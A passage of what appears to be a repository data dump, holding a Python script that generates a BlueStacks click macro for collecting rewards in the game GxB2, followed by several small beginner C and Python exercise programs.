"text": "\"\"\"\njsonGenerator.py\nauthor: Toby\ndate: Aug. 21 2021\n\nHere is a systematic way to generate BlueStack marco for GxB2.\n\nTODO:\n- auto excursion explore [DONE]\n- pet training [DONE]\n- pet fighting\n\"\"\"\n\nimport json\nfrom datetime import datetime\n\nRESOLUTION_X = 900\nRESOLUTION_Y = 1600\nFOUR_HOURS = 14400 # in second\nSECOND = 1000\nMINUTE = SECOND * 60\n\n# Locations\nCLEARALL = (83, 5)\nGAME_ENTRANCE = (444, 366)\nHOMEPAGE_TAB = (54, 1558)\nCAPSULE_TAB = (522, 1522)\nGUILD_TAB = (666, 1525)\nALCHEMY_BUTTON = (420, 48.5)\nCAMPAIGN_BUTTON = (444, 1285)\nEXCURSION_BUTTON = (840, 673)\nQUIZ_BUTTON = (844, 430)\nRETURN_AND_MAILBOX_BUTTON = (838, 55)\nFRIENDS_BUTTON = (828, 170)\nSERVANT_BUTTON = (841, 545)\n\n\nclass Solution:\n def __init__(self, START_TIME=1000, DEBUG=False):\n self.data = {}\n self.moving_timestamp = START_TIME\n self.DEFAULT_WAIT = 2 * SECOND # ms\n self.LONGER_WAIT = 4 * SECOND # ms\n self.DEBUG = DEBUG\n\n # the basic blocks\n def saveJson(self, filename=\"data.json\"):\n \"\"\"\n Save the json dictionary to file.\n \"\"\"\n text_content = json.dumps(self.data, indent=4, sort_keys=False)\n if self.DEBUG:\n print(text_content)\n with open(filename, \"w\") as outfile:\n outfile.write(text_content)\n\n def createHeader(self):\n \"\"\"\n Create header for the json file.\n \"\"\"\n self.data[\"Acceleration\"] = 1\n self.data[\"CreationTime\"] = datetime.now().strftime(\"%Y%m%dT%H%M%S\")\n self.data[\"DoNotShowWindowOnFinish\"] = False\n self.data[\"Events\"] = []\n\n def createFooter(\n self,\n LoopInterval=FOUR_HOURS,\n LoopType=\"UntilStopped\",\n RestartPlayerAfterMinutes=60,\n ):\n \"\"\"\n Create footer for the json file.\n \"\"\"\n self.data[\"LoopDuration\"] = 0\n self.data[\"LoopInterval\"] = LoopInterval\n self.data[\"LoopIterations\"] = 1\n self.data[\"LoopType\"] = LoopType\n self.data[\"MacroSchemaVersion\"] = 2\n self.data[\"RestartPlayer\"] = False\n self.data[\"RestartPlayerAfterMinutes\"] = RestartPlayerAfterMinutes\n\n # def addEvent(self, start_timestamp, X, Y, span=100):\n def addEvent(self, start_timestamp, coordinateXY, span=100):\n \"\"\"\n General type for adding an event, which will be\n one mouse down and one mouse up by default.\n start_timestamp: the starting time stamp for this event, in int\n coordinateXY: a tuple (int, int) for (X, Y) location\n span: time between mouse down and mouse up in ms\n \"\"\"\n X, Y = coordinateXY\n if X > 100 or Y > 100:\n local_X = 100 * X / RESOLUTION_X # change to 0-100 %\n local_Y = 100 * Y / RESOLUTION_Y\n else:\n local_X = X\n local_Y = Y\n\n mouseDown = {\n \"Delta\": 0,\n \"EventType\": \"MouseDown\",\n \"Timestamp\": start_timestamp,\n \"X\": local_X,\n \"Y\": local_Y,\n }\n mouseUp = {\n \"Delta\": 0,\n \"EventType\": \"MouseUp\",\n \"Timestamp\": start_timestamp + span,\n \"X\": local_X,\n \"Y\": local_Y,\n }\n self.data[\"Events\"].append(mouseDown)\n self.data[\"Events\"].append(mouseUp)\n\n def returnHomepage(self):\n for _ in range(2):\n self.addEvent(self.moving_timestamp, HOMEPAGE_TAB)\n self.moving_timestamp += 2 * SECOND\n\n # the specific function blocks\n def openGame(self, timestamp=1400):\n self.moving_timestamp += timestamp\n self.addEvent(self.moving_timestamp, GAME_ENTRANCE)\n # wait for 30 seconds in case of update\n self.moving_timestamp += 30 * SECOND\n\n def closeAll(self):\n task = {\"EventType\": \"UiRecentApps\", \"Timestamp\": self.moving_timestamp}\n self.data[\"Events\"].append(task)\n self.moving_timestamp += 5 * SECOND\n self.addEvent(self.moving_timestamp, CLEARALL)\n\n def getCampaignRewards(self):\n \"\"\"\n Get campaign rewards.\n A closed loop from home to home.\n \"\"\"\n self.returnHomepage()\n\n # enter campaign\n self.addEvent(self.moving_timestamp, CAMPAIGN_BUTTON)\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit collect 5 times\n for _ in range(5):\n self.addEvent(self.moving_timestamp, (822, 880))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # open the item box\n self.addEvent(self.moving_timestamp, (814, 1365))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit claim\n self.addEvent(self.moving_timestamp, (457, 1091))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # go back to the front page\n self.returnHomepage()\n\n def getDormRewards(self):\n self.returnHomepage()\n\n # go to campus\n self.addEvent(self.moving_timestamp, (113, 1297))\n self.moving_timestamp += self.LONGER_WAIT\n\n # go life tab\n self.addEvent(self.moving_timestamp, (660, 149))\n self.moving_timestamp += self.LONGER_WAIT\n\n # select Dorm\n self.addEvent(self.moving_timestamp, (668, 437))\n self.moving_timestamp += self.LONGER_WAIT\n\n # clicl claim\n self.addEvent(self.moving_timestamp, (142, 226))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit collect\n self.addEvent(self.moving_timestamp, (471, 973))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit return\n self.addEvent(self.moving_timestamp, (838, 55))\n self.moving_timestamp += self.LONGER_WAIT\n\n # go back to home page\n self.returnHomepage()\n\n def getExcursionRewards(self):\n self.returnHomepage()\n\n # go to excursion\n self.addEvent(self.moving_timestamp, EXCURSION_BUTTON)\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit claim all\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (144, 1450))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # hit auto explore\n self.addEvent(self.moving_timestamp, (702, 1336))\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (450, 1238))\n self.moving_timestamp += 10 * SECOND\n\n # hit return *\n for _ in range(4):\n self.addEvent(self.moving_timestamp, (838, 55))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # re-init\n self.returnHomepage()\n\n def getFreeRegularCapus(self):\n self.returnHomepage()\n\n # go to capsule\n self.addEvent(self.moving_timestamp, CAPSULE_TAB)\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # hit regular pull\n self.addEvent(self.moving_timestamp, (536, 398))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit OK\n self.addEvent(self.moving_timestamp, (181, 1025))\n self.moving_timestamp += self.LONGER_WAIT\n\n self.returnHomepage()\n\n def doOneJuniorLeagueBattle(self):\n self.returnHomepage()\n\n # go to League\n self.addEvent(self.moving_timestamp, (800, 1300))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # go to League tab\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (666, 152))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # go to Junior section\n self.addEvent(self.moving_timestamp, (455, 350))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n self.addEvent(self.moving_timestamp, (463, 1326)) # hit fight\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (747, 952)) # pick the 3rd opponent\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (455, 924)) # confirm fight\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (817, 719)) # select reward\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (444, 1109)) # return *\n self.moving_timestamp += self.DEFAULT_WAIT\n self.returnHomepage()\n\n def getQuizRewards(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, QUIZ_BUTTON) # open quiz\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 1365)) # claim all\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 1189)) # OK *\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 1159)) # OK *\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def getAlchemyRewards(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, ALCHEMY_BUTTON) # hit alchemy +\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (275, 953)) # hit free\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def getAllMailRewards(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, RETURN_AND_MAILBOX_BUTTON) # hit mail box\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (442, 1266)) # claim all\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def takeServantClass(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, SERVANT_BUTTON)\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (450, 887))\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(3):\n self.addEvent(self.moving_timestamp, (810, 223))\n self.moving_timestamp += self.DEFAULT_WAIT\n for _ in range(3):\n self.addEvent(self.moving_timestamp, (512, 927))\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def getFriendsRewards(self, doCoop=True):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, FRIENDS_BUTTON) # open friends\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (730, 544)) # cliam and send\n self.moving_timestamp += self.DEFAULT_WAIT\n\n if doCoop:\n self.addEvent(self.moving_timestamp, (744, 442)) # go coop\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (454, 1169)) # fight\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 923)) # confirm fight\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (450, 1500)) # OK\n self.moving_timestamp += self.LONGER_WAIT\n\n self.returnHomepage()\n\n def getGuildRewards(self):\n self.returnHomepage()\n\n # sign-in\n self.addEvent(self.moving_timestamp, GUILD_TAB)\n self.moving_timestamp += self.LONGER_WAIT\n\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (457, 380))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (711, 772))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # return to guild page and do caffee\n for _ in range(3):\n self.addEvent(self.moving_timestamp, GUILD_TAB)\n self.moving_timestamp += self.DEFAULT_WAIT\n\n for _ in range(4):\n self.addEvent(self.moving_timestamp, (758, 443))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (454, 1180))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n self.addEvent(self.moving_timestamp, (184, 856)) # task 1\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (455, 856)) # task 2\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (716, 856)) # task 3\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (184, 1276)) # task 4\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (455, 1276)) # task 5\n self.moving_timestamp += self.DEFAULT_WAIT\n\n self.returnHomepage()\n\n\ndef main():\n app = Solution()\n app.createHeader()\n\n # start the app\n app.openGame()\n app.getCampaignRewards()\n app.getDormRewards()\n app.getExcursionRewards()\n app.doOneJuniorLeagueBattle()\n app.getFreeRegularCapus()\n app.getGuildRewards()\n app.getQuizRewards()\n app.getAlchemyRewards()\n app.getAllMailRewards()\n app.takeServantClass()\n app.getFriendsRewards()\n app.closeAll()\n app.createFooter(\n LoopInterval=(FOUR_HOURS - app.moving_timestamp // SECOND)\n ) # time calculated in seconds\n app.saveJson()\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
gurusarishkumar-it19/myprograms
|
https://github.com/gurusarishkumar-it19/myprograms
|
5e9d1f557929bae361bc13efa2c44a269827b61b
|
dd33c41001644d91fdc3c6fc81c6028ab75b8cee
|
caa1f6a621875883098c380550fe9c669585fe44
|
refs/heads/master
| 2020-08-02T17:43:14.967222 | 2019-11-19T12:42:46 | 2019-11-19T12:42:46 | 211,451,131 | 9 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5591397881507874,
"alphanum_fraction": 0.5806451439857483,
"avg_line_length": 30,
"blob_id": "33c12f7fb0c9a0e3d54c1c4625ce2e7a1757f1a5",
"content_id": "0922deb853446354292b4e1abc3ec4bb9323c441",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 3,
"path": "/prog16.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "n = int(input(\"Enter the n value :\"))\nsum = (n*(n+1))/2\nprint(\"sum of n numbers :\",int(sum))\n"
},
{
"alpha_fraction": 0.5631067752838135,
"alphanum_fraction": 0.5631067752838135,
"avg_line_length": 19.600000381469727,
"blob_id": "fb1e4420526abd29e8e16d7f55bb67bcb2f7646f",
"content_id": "79f6688250fdd55042217c79cc36d5b98f0306b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 5,
"path": "/prog9.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a = input()\nb = len(a)\nfor i in range(b):\n print(\"address of character\",a[i],\"=\",id(a[i]))\nprint(a)\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 23,
"blob_id": "69607d3f8c296f5df34218ea708d07fd53c745f9",
"content_id": "40284fad012b7878bd2fd9f47abfef1657af46d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/prog8.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "print(\"Hello BITSathy\")\n"
},
{
"alpha_fraction": 0.49609375,
"alphanum_fraction": 0.52734375,
"avg_line_length": 18.69230842590332,
"blob_id": "4ff7879ce9aa665bbe3a489a636bfc7109dda921",
"content_id": "9fdeedaa57a13e64bc8c72b2e7d948fdedcfecfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/prog38.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n int num1,num2,i;\n printf(\"Enter the two numbers : \");\n scanf(\"%d %d\",&num1,&num2);\n printf(\"\\nIntegers between two integers :\");\n for(i=num1+1;i<num2;i++)\n {\n printf(\"\\n%d\",i);\n }\n return 0;\n}\n"
},
{
"alpha_fraction": 0.3896103799343109,
"alphanum_fraction": 0.4318181872367859,
"avg_line_length": 19.53333282470703,
"blob_id": "1b85d33989adf55471941330f945bb7b841f22fc",
"content_id": "f8d4746bb1f896cd51f309d12c740dc5a99553b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 15,
"path": "/prog15.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int i,a[10];\n printf(\"Enter 10 numbers :\");\n for(i=0;i<10;i++)\n {\n printf(\"\\n\");\n scanf(\"%d\",&a[i]);\n if(a[i]==23)\n printf(\"\\n%d this number is 23\",a[i]);\n else\n printf(\"\\n%d this number is not 23\",a[i]);\n }\n}\n"
},
{
"alpha_fraction": 0.37931033968925476,
"alphanum_fraction": 0.39224138855934143,
"avg_line_length": 13.5,
"blob_id": "d3c3161d70dd1b92e56e281e8431ecc2c9e620b7",
"content_id": "c8877e33f2ebcc2d189d498ddd5657df2bb932da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 16,
"path": "/prog17.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int i,n,sum=0;\n scanf(\"%d\",&n);\n int num[n];\n for(i=0;i<n;i++)\n {\n scanf(\"%d\",&num[i]);\n }\n for(i=0;i<n;i++)\n {\n sum=sum+num[i];\n }\n printf(\"\\n%d\",sum);\n}\n"
},
{
"alpha_fraction": 0.4301075339317322,
"alphanum_fraction": 0.4838709533214569,
"avg_line_length": 12.285714149475098,
"blob_id": "eebbc5d650eec1127c1d52517ca7d3d2ee8763a0",
"content_id": "21ee8d57ad3a1eb4adff5b4208d245417c0cfbac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 7,
"path": "/prog1.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main() {\n int a=40,b=80;\n printf(\"%d\",a+b);\n return 0;\n \n}\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.6805555820465088,
"avg_line_length": 27.799999237060547,
"blob_id": "ad6114b0bd5c64da0576783e3755946a25cacec2",
"content_id": "4738035dfe75eba8e29afeef7aa6104018e2a495",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 5,
"path": "/prog38.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num1=int(input(\"Enter the numbers : \"))\nnum2=int(input())\nprint(\"Integers between the two numbers :\")\nfor i in range(num1+1,num2):\n print(i)\n"
},
{
"alpha_fraction": 0.6071428656578064,
"alphanum_fraction": 0.6071428656578064,
"avg_line_length": 24.66666603088379,
"blob_id": "3589333f0c37c5cdc4c9650c9c1281c829e3cd3b",
"content_id": "1115e2918fd48bff932c77893887a5efd34ae0f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 12,
"path": "/prog39.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "n = int(input(\"Enter the size of array :\"))\nprint(\"Enter the elements :\\n\")\narray = []\nfor i in range(n):\n a=int(input())\n array.append(a)\nprint(\"\\nyour elements:\\n\")\nfor i in range(n):\n print(array[i])\nprint(\"\\nAddress :\\n\")\nfor i in range(n):\n print(\"address of the\",array[i],\"=\",id(array[i]))\n"
},
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.6274510025978088,
"avg_line_length": 20.85714340209961,
"blob_id": "d3a2b79453766f7b9f5f63ec6d582075242676b7",
"content_id": "15335d909c3b27c730ffe421cb03a3582b62dc2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 7,
"path": "/prog18.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Enter the number : \"))\nadd=0\nwhile(num!=0):\n reverse=num%10\n num=int(num/10)\n add=add+reverse\nprint(\"Sum of the digits :\",add)\n"
},
{
"alpha_fraction": 0.48404255509376526,
"alphanum_fraction": 0.5319148898124695,
"avg_line_length": 30.33333396911621,
"blob_id": "34cbbbe505d607dc5c647d0e19f3e2ac64c11c0b",
"content_id": "6f70e69a95faf6f10f0ea361194da0d4401c7b70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 6,
"path": "/prog15.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "for i in range(1,11):\n num = int(input(\"\\nEnter the number :\"))\n if num==23:\n print(\"\\n\",num,\" this number is 23\")\n else :\n print(\"\\n\",num,\" this number is not 23\")\n"
},
{
"alpha_fraction": 0.4390243887901306,
"alphanum_fraction": 0.5365853905677795,
"avg_line_length": 19.5,
"blob_id": "7bf011bc3bf67a561e7289b40a68fd521f4c2a3a",
"content_id": "cff6ba85a411b42bdd2310abd566e9b5aa5b509a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 2,
"path": "/prog6.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "for i in range(1,101):\n print(\"\\n\",i)\n"
},
{
"alpha_fraction": 0.48230087757110596,
"alphanum_fraction": 0.4955752193927765,
"avg_line_length": 16.384614944458008,
"blob_id": "2a4ed5385dd7fd6f8589fed072628991bfcae3e1",
"content_id": "02eba688caca1bd3610f96ce23f70b4924653552",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 226,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 13,
"path": "/prog2.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n int i,num,fact = 1;\n printf(\"Enter the number :\");\n scanf(\"%d\",&num);\n for(i=1;i<=num;i++)\n {\n fact = i*fact;\n }\n printf(\"The factorial is %d\",fact);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5905511975288391,
"alphanum_fraction": 0.6141732335090637,
"avg_line_length": 24.399999618530273,
"blob_id": "570c20d0bf3d949db1470fa8ecb5ccb617c1e54a",
"content_id": "e92011a2f23a20c4d68084cfcaf526e709780f36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/prog2.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Enter the number :\"))\nfact = 1\nfor i in range(1,num + 1):\n fact = fact * i\nprint(\"The factorial is \",fact)\n"
},
{
"alpha_fraction": 0.5227272510528564,
"alphanum_fraction": 0.5340909361839294,
"avg_line_length": 13.333333015441895,
"blob_id": "a8db063b9b5a21576d9b8eb06041bbb003f2c19f",
"content_id": "3e11ce45fd6196a343d9abdb970b114ad339846c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 6,
"path": "/prog8.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nchar main()\n{\n printf(\"Hello BITSathy\");\n return 0;\n}\n\n\n"
},
{
"alpha_fraction": 0.47136563062667847,
"alphanum_fraction": 0.4889867901802063,
"avg_line_length": 15.214285850524902,
"blob_id": "0dd5c98cbf72428b0b17592401ddd82966ed5bd6",
"content_id": "9e4251ddaf2bb2615f5fb2b19d41b0b868b45e70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 14,
"path": "/prog9.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\n#include<string.h>\nvoid main()\n{\n int i,len;\n char a[100];\n gets(a);\n len=strlen(a);\n for(i=0;i!=len;i++)\n {\n printf(\"address of character %c = %p \\n\",a[i],a[i]);\n }\n puts(a);\n}\n"
},
{
"alpha_fraction": 0.3958333432674408,
"alphanum_fraction": 0.42916667461395264,
"avg_line_length": 16.14285659790039,
"blob_id": "56b54f6984575dac76b89009acd02fa6956b30ee",
"content_id": "e3afd1cd973204ca926330283b5fbac0824635b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 14,
"path": "/prog11.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int a[10],i,j;\n for(i=0;i<10;i++)\n {\n scanf(\"%d\",&a[i]);\n }\n printf(\"contant :\\n\\n\");\n for(j=0;j<10;j++)\n {\n printf(\"address of this integer %d = %p\\n\",a[j],a[j]);\n }\n}\n"
},
{
"alpha_fraction": 0.5566037893295288,
"alphanum_fraction": 0.5754716992378235,
"avg_line_length": 14.142857551574707,
"blob_id": "0c4df4128faf8f8f0cf5fe10b84c4d1dca384c1a",
"content_id": "cf7a28bbae4babe7b009eae3938792b82ff0a050",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 7,
"path": "/prog44.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a=[]\nprint(\"Enter the number :\")\nfor i in range(10):\n b=int(input())\n a.append(b)\na.sort()\nprint(a)\n"
},
{
"alpha_fraction": 0.6339869499206543,
"alphanum_fraction": 0.6339869499206543,
"avg_line_length": 24.5,
"blob_id": "47fffa4a52e694f1ca06d9c1ebcca180ee2dc8b2",
"content_id": "839e26f255d59edb535107f3a1cfcddd779e0315",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 6,
"path": "/prog17.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "n=int(input(\"How many numbers want to sum ?\"))\nnum=[]\nfor i in range(n):\n a=int(input())\n num.append(a)\nprint(\"sum of the given numbers\",sum(num))\n"
},
{
"alpha_fraction": 0.40852129459381104,
"alphanum_fraction": 0.4160400927066803,
"avg_line_length": 14.960000038146973,
"blob_id": "e759aeff67819a757930c350deeb2f02c6a523d1",
"content_id": "2bb195d169c950ac5877398d747f4c98d7d777ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/prog39.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int n,i;\n scanf(\"%d\",&n);\n\n int a[n];\n printf(\"Enter the elements:\\n\\n\");\n for(i=0;i<n;i++)\n {\n scanf(\"%d\",&a[i]);\n }\n\n printf(\"\\nyour elements :\\n\\n\");\n for(i=0;i<n;i++)\n {\n printf(\"%d\\n\",a[i]);\n }\n\n printf(\"\\naddress:\\n\\n\");\n for(i=0;i<n;i++)\n {\n printf(\"address of the %d = %p\\n\",a[i],a[i]);\n }\n}\n"
},
{
"alpha_fraction": 0.4844290614128113,
"alphanum_fraction": 0.512110710144043,
"avg_line_length": 18.266666412353516,
"blob_id": "c8e16820e3a3f8a8095171406db110b0f6ecba13",
"content_id": "c3d0655023b0633f7ed85960e5119260b9cecce2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 15,
"path": "/prog18.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n long int num,i,reverse,sum=0;\n printf(\"Enter the number : \");\n scanf(\"%ld\",&num);\n for(i=1;num!=0;i++)\n {\n reverse=num%10;\n num=num/10;\n sum=sum+reverse;\n }\n printf(\"\\nSum of the digits = %ld\",sum);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5317460298538208,
"avg_line_length": 20,
"blob_id": "a09f2956129d3bc911216f926f7651f056d95f81",
"content_id": "b359cddf7061d9c3a7b34d159a175efd0720056f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 6,
"path": "/prog11.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a=[]\nfor i in range(10):\n b=int(input())\n a.append(b)\nfor j in range(10):\n print(\"address of the\",a[j],\"=\",id(a[j]))\n"
},
{
"alpha_fraction": 0.6040816307067871,
"alphanum_fraction": 0.6040816307067871,
"avg_line_length": 26.22222137451172,
"blob_id": "28844451b3ed23c85f3870d8e004b132f98290ff",
"content_id": "955ce64447517a7e5efb1af9f2a4750f4660a322",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 9,
"path": "/prog14.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "x = int(input(\"Enter the number :\"))\ny = int(input(\"Enter the number :\"))\nz = int(input(\"Enter the number :\"))\nif x>y and x>z :\n print(\"Greatest number :\",x)\nelif y>z :\n print(\"Greatest number :\",y)\nelse :\n print(\"Greatest number :\",z)\n"
},
{
"alpha_fraction": 0.6344085931777954,
"alphanum_fraction": 0.6451612710952759,
"avg_line_length": 14.5,
"blob_id": "19acf19618051461f6fe0d0872f14a83dec7c0d2",
"content_id": "d72fe72ec7fedc4a6edcf31891f5faaee6e1af90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
